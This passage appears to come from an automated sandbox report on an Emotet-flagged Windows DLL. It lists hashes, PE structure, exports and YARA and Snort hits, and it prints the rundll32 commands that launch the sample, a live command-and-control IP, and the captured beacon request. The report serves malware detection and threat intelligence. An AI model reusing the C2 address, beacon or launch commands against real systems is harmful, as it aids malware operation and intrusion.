Preview:	..........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....M.p.C.m.d.R.u.n.:. .C.o.m.m.a.n.d. .L.i.n.e.:. .".C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.\.m.p.c.m.d.r.u.n...e.x.e.". .-.w.d.e.n.a.b.l.e..... .S.t.a.r.t. .T.i.m.e.:. .. T.h.u. .. J.u.n. .. 2.7. .. 2.0.1.9. .0.1.:.2.9.:.4.9.........M.p.E.n.s.u.r.e.P.r.o.c.e.s.s.M.i.t.i.g.a.t.i.o.n.P.o.l.i.c.y.:. .h.r. .=. .0.x.1.....W.D.E.n.a.b.l.e.....E.R.R.O.R.:. .M.p.W.D.E.n.a.b.l.e.(.T.R.U.E.). .f.a.i.l.e.d. .(.8.0.0.7.0.4.E.C.).....M.p.C.m.d.R.u.n.:. .E.n.d. .T.i.m.e.:. .. T.h.u. .. J.u.n. .. 2.7. .. 2.0.1.9. .0.1.:.2.9.:.4.9.....-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.............-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\DeliveryOptimization\Logs\dosvc.20211119_085830_065.etl Download File
Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	12288
Entropy (8bit):	3.8155632809083784
Encrypted:	false
SSDEEP:	96:sbCLO2o+ZK5Fu9+/YrmCKvI2l/SkQP46lT24jFzdNMCKdJRej52F+NMCAY5+bUM4:sOLt5kWt28rcCqTNCITCpCVCcCR
MD5:	469DA211A59A2EB76ECA172177D95D00
SHA1:	CE8D4B0BA25F6C4935EE133D04EA3D115C5B9C1D
SHA-256:	760E93FC4B973D77DE91BD19F204F02F264FCEF7B1ABE581618D21DCBF3B9765
SHA-512:	278BEF860684BF53584AE62FC1C4D0CAE16806102DBEB6E44E3C46641E93D15D6DF0EC5CF2F6900A2461F695D6CDFD57D36CEC5A704981B22302577BCD05B64C
Malicious:	false
Preview:	.... ... ....................................... ...!....................................x+......................B..............Zb... ... ..........................................@.t.z.r.e.s...d.l.l.,.-.2.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.2.1.1..................................................................... ......G..#...........8.6.9.6.E.A.C.4.-.1.2.8.8.-.4.2.8.8.-.A.4.E.E.-.4.9.E.E.4.3.1.B.0.A.D.9...C.:.\.W.i.n.d.o.w.s.\.S.e.r.v.i.c.e.P.r.o.f.i.l.e.s.\.N.e.t.w.o.r.k.S.e.r.v.i.c.e.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.M.i.c.r.o.s.o.f.t.\.W.i.n.d.o.w.s.\.D.e.l.i.v.e.r.y.O.p.t.i.m.i.z.a.t.i.o.n.\.L.o.g.s.\.d.o.s.v.c...2.0.2.1.1.1.1.9._.0.8.5.8.3.0._.0.6.5...e.t.l.........P.P..........x+.....................................................................................................................................................................................................................................................................

Static File Info

General
File type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.178854423942452
TrID:	Win32 Dynamic Link Library (generic) (1002004/3) 99.40% Clipper DOS Executable (2020/12) 0.20% Generic Win/DOS Executable (2004/3) 0.20% DOS Executable Generic (2002/1) 0.20% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	yFAXc9z51V.dll
File size:	485376
MD5:	fee9ba8d79bcbc58800fda0cafbe5f64
SHA1:	82eb29987e6ed568a5ae01816de7240df1490c0d
SHA256:	3e8acc4d85b6ffc06b18b97a33a43628e8c11bc4dde8648bcc8a2ad9b1154150
SHA512:	fbc664d79a841b054ae60045286871cc3af79be10193562f730245941772241fcd56854c9decb18182832b1db5a2bbfff346e15c0c8af9b25c24bd8fe285062f
SSDEEP:	12288:bdv8jkvzqZvv2wLBVmTi12yD88kYwZ1h1:b2Zvv2ccTi1v0Z1h
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................................................................................................................................

File Icon


Icon Hash:	74f0e4ecccdce0e4

Static PE Info

General
Entrypoint:	0x10015826
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x10000000
Subsystem:	windows gui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT
Time Stamp:	0x61964C08 [Thu Nov 18 12:50:16 2021 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	261bae8b02d2e7bf979e55d76b9dc786

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
cmp dword ptr [ebp+0Ch], 01h
jne 00007F0DD8B540D7h
call 00007F0DD8B5452Ah
push dword ptr [ebp+10h]
push dword ptr [ebp+0Ch]
push dword ptr [ebp+08h]
call 00007F0DD8B53F88h
add esp, 0Ch
pop ebp
retn 000Ch
push ebp
mov ebp, esp
push esi
push dword ptr [ebp+08h]
mov esi, ecx
call 00007F0DD8B3FF1Eh
mov dword ptr [esi], 1003B3E8h
mov eax, esi
pop esi
pop ebp
retn 0004h
and dword ptr [ecx+04h], 00000000h
mov eax, ecx
and dword ptr [ecx+08h], 00000000h
mov dword ptr [ecx+04h], 1003B3F0h
mov dword ptr [ecx], 1003B3E8h
ret
push ebp
mov ebp, esp
push esi
push dword ptr [ebp+08h]
mov esi, ecx
call 00007F0DD8B3FEEBh
mov dword ptr [esi], 1003B404h
mov eax, esi
pop esi
pop ebp
retn 0004h
and dword ptr [ecx+04h], 00000000h
mov eax, ecx
and dword ptr [ecx+08h], 00000000h
mov dword ptr [ecx+04h], 1003B40Ch
mov dword ptr [ecx], 1003B404h
ret
push ebp
mov ebp, esp
push esi
mov esi, ecx
lea eax, dword ptr [esi+04h]
mov dword ptr [esi], 1003B3DCh
push eax
call 00007F0DD8B577E6h
test byte ptr [ebp+08h], 00000001h
pop ecx
je 00007F0DD8B540DCh
push 0000000Ch
push esi
call 00007F0DD8B5355Dh
pop ecx
pop ecx
mov eax, esi
pop esi
pop ebp
retn 0004h
push ebp
mov ebp, esp
sub esp, 0Ch
lea ecx, dword ptr [ebp-0Ch]
call 00007F0DD8B5404Fh
push 0004CC44h

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x4d710	0x5c0	.rdata
IMAGE_DIRECTORY_ENTRY_IMPORT	0x4dcd0	0xb4	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x52000	0x24410	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x77000	0x33a0	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x498f8	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x3b000	0x2f8	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x3930c	0x39400	False	0.530729735262	data	6.66187646144	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata	0x3b000	0x13cfe	0x13e00	False	0.464512087264	data	5.41556152438	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x4f000	0x252c	0x1800	False	0.223795572917	data	3.845062089	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc	0x52000	0x24410	0x24600	False	0.818520457474	data	7.74949552696	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x77000	0x33a0	0x3400	False	0.71484375	data	6.58405020621	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
REGISTRY	0x758d0	0x98	ASCII text, with CRLF line terminators	English	United States
REGISTRY	0x75968	0x260	ASCII text, with CRLF line terminators	English	United States
TYPELIB	0x75bc8	0x69c	data	English	United States
RT_BITMAP	0x52220	0x23467	data	English	United States
RT_STRING	0x76268	0x26	data	English	United States
RT_VERSION	0x75688	0x244	data	English	United States
RT_MANIFEST	0x76290	0x17d	XML 1.0 document text	English	United States

Imports

DLL	Import
pdh.dll	PdhGetFormattedCounterValue, PdhCollectQueryData, PdhCloseQuery, PdhRemoveCounter, PdhAddCounterW, PdhValidatePathW, PdhOpenQueryW
KERNEL32.dll	GetErrorMode, GetThreadErrorMode, GetCommandLineA, GetEnvironmentStringsW, GetCurrentProcessorNumber, IsDebuggerPresent, GetTickCount64, AreFileApisANSI, GetOEMCP, GetCommandLineW, TlsAlloc, GetCurrentThreadId, GetSystemDefaultUILanguage, MultiByteToWideChar, RaiseException, GetLastError, InitializeCriticalSectionEx, DeleteCriticalSection, DecodePointer, EnterCriticalSection, LeaveCriticalSection, LoadResource, SizeofResource, FindResourceW, GetModuleHandleW, GetProcAddress, LoadLibraryExW, GetModuleFileNameW, lstrcmpiW, FreeLibrary, MulDiv, SetLastError, TerminateProcess, SetFilePointerEx, ReadConsoleW, GetConsoleMode, GetConsoleCP, WriteFile, GetCurrentThread, EnumSystemLocalesW, GetUserDefaultLCID, IsValidLocale, FreeEnvironmentStringsW, IsValidCodePage, FindFirstFileExA, HeapReAlloc, HeapSize, GetFileType, GetStdHandle, GetModuleFileNameA, GetModuleHandleExW, ExitProcess, InterlockedFlushSList, RtlUnwind, LocalFree, LoadLibraryExA, VirtualFree, VirtualAlloc, FlushInstructionCache, InterlockedPushEntrySList, InterlockedPopEntrySList, HeapFree, HeapAlloc, OutputDebugStringW, GetCPInfo, GetStringTypeW, GetLocaleInfoW, LCMapStringW, TlsFree, TlsSetValue, TlsGetValue, InitializeCriticalSectionAndSpinCount, EncodePointer, GetSystemDefaultLangID, GetACP, SwitchToThread, IsProcessorFeaturePresent, UnregisterApplicationRestart, IsSystemResumeAutomatic, GetProcessHeap, CloseHandle, ReadFile, FindClose, GetUserDefaultUILanguage, FindNextFileA, SetStdHandle, WriteConsoleW, CreateFileW, GetCurrentProcess, SetUnhandledExceptionFilter, FlushFileBuffers, WideCharToMultiByte, InitializeSListHead, GetSystemTimeAsFileTime, GetCurrentProcessId, QueryPerformanceCounter, GetStartupInfoW, UnhandledExceptionFilter
USER32.dll	GetMenuCheckMarkDimensions, GetForegroundWindow, AnyPopup, CloseClipboard, GetClipboardViewer, GetWindowLongW, GetKBCodePage, CallWindowProcW, DrawTextW, InsertMenuW, RegisterClassExW, LoadCursorW, GetClassInfoExW, DefWindowProcW, IsWindow, GetParent, SetTimer, ShowWindow, InvalidateRect, ReleaseDC, GetDC, EndPaint, BeginPaint, ClientToScreen, GetClientRect, SendMessageW, DestroyWindow, CreateWindowExW, SetWindowLongW, CharNextW, UnregisterClassW, DestroyCaret, EmptyClipboard, GetDialogBaseUnits, GetShellWindow, GetOpenClipboardWindow
GDI32.dll	SetBkMode, SetTextColor, CreateFontW, DeleteDC, BitBlt, CreateCompatibleDC, CreateCompatibleBitmap, DeleteObject, SelectObject, GetDeviceCaps, GetTextMetricsW
ADVAPI32.dll	RegDeleteValueW, RegQueryInfoKeyW, RegSetValueExW, RegEnumKeyExW, RegCloseKey, RegDeleteKeyW, RegCreateKeyExW, RegOpenKeyExW
SHELL32.dll	ShellExecuteW, SHGetFolderPathW
ole32.dll	CoFreeUnusedLibraries, CoUninitialize, CoCreateInstance, CoInitialize, OleRun, CoTaskMemAlloc, CoTaskMemRealloc, CoTaskMemFree
OLEAUT32.dll	LoadRegTypeLib, SysAllocStringLen, SysFreeString, SysAllocString, SysStringLen, VarBstrCmp, VariantInit, VariantClear, VariantCopy, VariantChangeType, VarUI4FromStr, LoadTypeLib

Exports

Name	Ordinal	Address
Control_RunDLL	1	0x10001200
abziuleoxsborpb	2	0x10001570
aejkroaebsbxdnkhb	3	0x10001430
amgshvm	4	0x10001340
bjtmgxqrshhlmbh	5	0x10001320
ciqnowraabbra	6	0x100013e0
cmiqzvq	7	0x10001450
crprctzst	8	0x10001360
cwiynhgawsfh	9	0x100012f0
dhfyfrdbpo	10	0x100012c0
dvmyigplnf	11	0x10001480
erlpzdqhrlacaxnda	12	0x10001440
euduauchas	13	0x100014b0
fjorczheej	14	0x10001390
fqtruzg	15	0x100014c0
fzxvmnutn	16	0x100014d0
ghrfpkc	17	0x10001280
ghrmmrvezk	18	0x10001530
hjbgnfzrilso	19	0x100015d0
hvbblczdjkdx	20	0x10001310
ifsmmtyjag	21	0x10001310
jbgiwxjtyvvaxuitk	22	0x10001410
jhjtpuvq	23	0x10001260
jovvzziqyeznb	24	0x100015a0
kbkufclc	25	0x100014e0
kxpdpqduritjwfv	26	0x10001560
lfirwsslmgzmfg	27	0x10001330
mdaepyqwwigtzy	28	0x10001500
meqzizr	29	0x10001350
mmykgdmikdunzlhbb	30	0x10001520
mxqliouinhlsqvw	31	0x100013b0
mzxbssgzqetjmifs	32	0x10001490
ndzjkcaftnq	33	0x10001510
nfwlevhbaunupm	34	0x100013c0
njhdfbkyxqtwtcvsa	35	0x10001300
nmzgdiluzbemovs	36	0x10001400
obsypougzzamg	37	0x100013d0
oqzjqpsxbjh	38	0x100012d0
ormmaboaiinycs	39	0x10001230
pejacnmfhwmlhqc	40	0x10001340
pzgjkxaqryk	41	0x100015b0
qlsxhmuh	42	0x10001240
rykrtqanuszehh	43	0x10001550
sktlwejyhkbweva	44	0x100014a0
sromrbjt	45	0x10001460
txrogplicljtdlky	46	0x100012e0
tywxzfemhfuvwwqtq	47	0x10001270
ukeirvjwemstdk	48	0x10001250
usfroye	49	0x10001370
varapmou	50	0x100013a0
vjfbgya	51	0x100015c0
vpzxnmg	52	0x10001590
wniijfgeibtaumvma	53	0x100014f0
wtkpnwha	54	0x10001470
xkdmdojzjns	55	0x10001420
yumftkya	56	0x100012a0
ywkvngmohrw	57	0x10001380
ywwwgcpzcec	58	0x10001580
yyldomdvsymz	59	0x10001290
zdcdzgtngf	60	0x100012b0
zwxnlwalmcbgmt	61	0x100013f0
zzvywuxdvuecsm	62	0x10001540

Version Infos

Description	Data
InternalName	Erulfuaekg.dll
FileVersion	3.3.7.9
ProductName	Erulfuaekg
ProductVersion	3.3.7.9
FileDescription	asdzxcqwe123
OriginalFilename	Erulfuaekg.dll
Translation	0x0408 0x04e4

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
11/19/21-00:59:36.582289	TCP	2404334	ET CNC Feodo Tracker Reported CnC Server TCP group 18	49748	443	192.168.2.3	51.178.61.60

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 19, 2021 00:59:36.582288980 CET	49748	443	192.168.2.3	51.178.61.60
Nov 19, 2021 00:59:36.582340956 CET	443	49748	51.178.61.60	192.168.2.3
Nov 19, 2021 00:59:36.582457066 CET	49748	443	192.168.2.3	51.178.61.60
Nov 19, 2021 00:59:36.625246048 CET	49748	443	192.168.2.3	51.178.61.60
Nov 19, 2021 00:59:36.625317097 CET	443	49748	51.178.61.60	192.168.2.3
Nov 19, 2021 00:59:36.737946987 CET	443	49748	51.178.61.60	192.168.2.3
Nov 19, 2021 00:59:36.738127947 CET	49748	443	192.168.2.3	51.178.61.60
Nov 19, 2021 00:59:37.195852995 CET	49748	443	192.168.2.3	51.178.61.60
Nov 19, 2021 00:59:37.195907116 CET	443	49748	51.178.61.60	192.168.2.3
Nov 19, 2021 00:59:37.196508884 CET	443	49748	51.178.61.60	192.168.2.3
Nov 19, 2021 00:59:37.196604013 CET	49748	443	192.168.2.3	51.178.61.60
Nov 19, 2021 00:59:37.200416088 CET	49748	443	192.168.2.3	51.178.61.60
Nov 19, 2021 00:59:37.240883112 CET	443	49748	51.178.61.60	192.168.2.3
Nov 19, 2021 00:59:37.445020914 CET	443	49748	51.178.61.60	192.168.2.3
Nov 19, 2021 00:59:37.445099115 CET	443	49748	51.178.61.60	192.168.2.3
Nov 19, 2021 00:59:37.445350885 CET	49748	443	192.168.2.3	51.178.61.60
Nov 19, 2021 00:59:37.445377111 CET	49748	443	192.168.2.3	51.178.61.60
Nov 19, 2021 00:59:37.447535038 CET	49748	443	192.168.2.3	51.178.61.60
Nov 19, 2021 00:59:37.447571039 CET	443	49748	51.178.61.60	192.168.2.3

HTTP Request Dependency Graph

51.178.61.60

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.3	49748	51.178.61.60	443	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Direction	Data
2021-11-18 23:59:37 UTC	OUT	GET /RUMPKfyWvwh HTTP/1.1 Cookie: gVql=qP2SWVnr/WJG8YP5xSF8G7Rr6KkEKH5oVbT/aPyZcyn9K/saApq06qYJQ7VQDqAGQmsog3CqnGHN9x0QykU5uuVnobYs31akiF1WnncdqfGM3pGgWKZ2r4ogC9SE6Vh2+mnqzNK2/WuhSLvfpxzgrn3BeUCBI3LUqJXa1TfC4xBhYwdQa/6a5jixa5pMiqaToa/047TTwtpTt5xgOLwssCVW5YzKACeEqQfp8YgGPHadd14J0SJTGVNqyFCbrXXoDBPSb3GwjcRynh1BJ5z3u6jM5aWKTd6XgU1rwPi8sKMzrSyB1Zu0v5YluHWstRSulPtNogkEJBlOu+qxuLWX18w= Host: 51.178.61.60 Connection: Keep-Alive Cache-Control: no-cache
2021-11-18 23:59:37 UTC	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 18 Nov 2021 23:59:37 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2021-11-18 23:59:37 UTC	IN	Data Raw: 32 33 37 0d 0a 5f b0 47 cc 74 f0 42 ef 83 3d 1b 5a 94 05 58 5f e5 ff d9 ee 9d 3d 93 0f fc aa 7c 43 b7 a3 31 3b dc c4 30 ad bf 98 5f a3 13 fe f9 18 d5 08 0a a0 4f 3e b9 75 42 a4 fe 8c 2a 0c 38 b8 d1 64 3a bf fe 4c 2f e4 73 0a 6e 70 05 2f b1 12 84 58 81 88 d6 10 7f f7 d6 5d 79 4e c9 79 51 13 82 bf ea ca 51 f4 00 72 7c 69 70 82 10 9b f7 dc 35 b3 9b ac 28 bb e6 85 fe b5 ba 1c 2b 64 9f af f9 0f 91 74 66 fb d9 a4 7f 62 07 73 f2 dc 75 bf 0d 35 ef be 86 a8 8d b9 35 40 17 06 92 0b 65 87 8e 58 8d fd 05 7f 32 9b ef 84 29 40 6d 6c 34 70 28 82 42 6a 9e 4f 1e a3 86 85 44 82 87 50 5b 96 d8 81 a5 3d c4 70 66 26 42 c2 c4 2d d9 c5 1e 5e b6 6c f5 72 be a3 6f 91 8c d7 91 e1 8c d7 0b 2a 51 e2 47 41 50 62 ce 72 bd 9e 6c 66 e2 f0 d8 2e 55 01 de 4c ee 93 5c 87 35 e8 50 64 cb c5 Data Ascii: 237_GtB=ZX_=\|C1;0_O>uB8d:L/snp/X]yNyQQr\|ip5(+dtfbsu55@eX2)@ml4p(BjODP[=pf&B-^lroQGAPbrlf.UL\5Pd

Code Manipulations

Statistics

Behavior

Click to jump to process

System Behavior

Analysis Process: svchost.exe PID: 3604 Parent PID: 572

General

Start time:	00:58:11
Start date:	19/11/2021
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
Imagebase:	0x7ff70d6e0000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: loaddll32.exe PID: 924 Parent PID: 5272

General

Start time:	00:58:11
Start date:	19/11/2021
Path:	C:\Windows\System32\loaddll32.exe
Wow64 process (32bit):	true
Commandline:	loaddll32.exe "C:\Users\user\Desktop\yFAXc9z51V.dll"
Imagebase:	0x290000
File size:	893440 bytes
MD5 hash:	72FCD8FB0ADC38ED9050569AD673650E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000001.00000002.390502900.000000000097D000.00000004.00000020.sdmp, Author: Joe Security
Reputation:	high

Analysis Process: svchost.exe PID: 6656 Parent PID: 572

General

Start time:	00:58:11
Start date:	19/11/2021
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
Imagebase:	0x7ff70d6e0000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: cmd.exe PID: 6648 Parent PID: 924

General

Start time:	00:58:11
Start date:	19/11/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd.exe /C rundll32.exe "C:\Users\user\Desktop\yFAXc9z51V.dll",#1
Imagebase:	0xd80000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: rundll32.exe PID: 2336 Parent PID: 924

General

Start time:	00:58:12
Start date:	19/11/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe C:\Users\user\Desktop\yFAXc9z51V.dll,Control_RunDLL
Imagebase:	0x1f0000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000004.00000002.365418732.0000000002ABA000.00000004.00000020.sdmp, Author: Joe Security
Reputation:	high

Analysis Process: rundll32.exe PID: 5564 Parent PID: 6648

General

Start time:	00:58:12
Start date:	19/11/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe "C:\Users\user\Desktop\yFAXc9z51V.dll",#1
Imagebase:	0x1f0000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000005.00000002.363481536.0000000002AFA000.00000004.00000020.sdmp, Author: Joe Security
Reputation:	high

Analysis Process: svchost.exe PID: 6108 Parent PID: 572

General

Start time:	00:58:12
Start date:	19/11/2021
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
Imagebase:	0x7ff70d6e0000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: svchost.exe PID: 6236 Parent PID: 572

General

Start time:	00:58:12
Start date:	19/11/2021
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	c:\windows\system32\svchost.exe -k unistacksvcgroup
Imagebase:	0x7ff70d6e0000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: rundll32.exe PID: 2528 Parent PID: 924

General

Start time:	00:58:16
Start date:	19/11/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe C:\Users\user\Desktop\yFAXc9z51V.dll,abziuleoxsborpb
Imagebase:	0x1f0000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000008.00000002.388952908.000000000295A000.00000004.00000020.sdmp, Author: Joe Security
Reputation:	high

Analysis Process: rundll32.exe PID: 160 Parent PID: 924

General

Start time:	00:58:23
Start date:	19/11/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe C:\Users\user\Desktop\yFAXc9z51V.dll,aejkroaebsbxdnkhb
Imagebase:	0x1f0000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000009.00000002.390623075.00000000028BA000.00000004.00000020.sdmp, Author: Joe Security

Analysis Process: svchost.exe PID: 6896 Parent PID: 572

General

Start time:	00:58:30
Start date:	19/11/2021
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k NetworkService -p
Imagebase:	0x7ff70d6e0000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Analysis Process: rundll32.exe PID: 6904 Parent PID: 5564

General

Start time:	00:58:41
Start date:	19/11/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\yFAXc9z51V.dll",Control_RunDLL
Imagebase:	0x1f0000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: rundll32.exe PID: 6976 Parent PID: 2336

General

Start time:	00:58:43
Start date:	19/11/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Wlimfwutowthen\gdntcqg.ebr",vQmrKt
Imagebase:	0x1f0000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.414340731.00000000033AA000.00000004.00000020.sdmp, Author: Joe Security

Analysis Process: SgrmBroker.exe PID: 4036 Parent PID: 572

General

Start time:	00:58:53
Start date:	19/11/2021
Path:	C:\Windows\System32\SgrmBroker.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\SgrmBroker.exe
Imagebase:	0x7ff7f54e0000
File size:	163336 bytes
MD5 hash:	D3170A3F3A9626597EEE1888686E3EA6
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: rundll32.exe PID: 6200 Parent PID: 2528

General

Start time:	00:58:54
Start date:	19/11/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\yFAXc9z51V.dll",Control_RunDLL
Imagebase:	0x1f0000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: rundll32.exe PID: 7156 Parent PID: 160

General

Start time:	00:59:00
Start date:	19/11/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\yFAXc9z51V.dll",Control_RunDLL
Imagebase:	0x1f0000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: rundll32.exe PID: 7148 Parent PID: 924

General

Start time:	00:59:00
Start date:	19/11/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
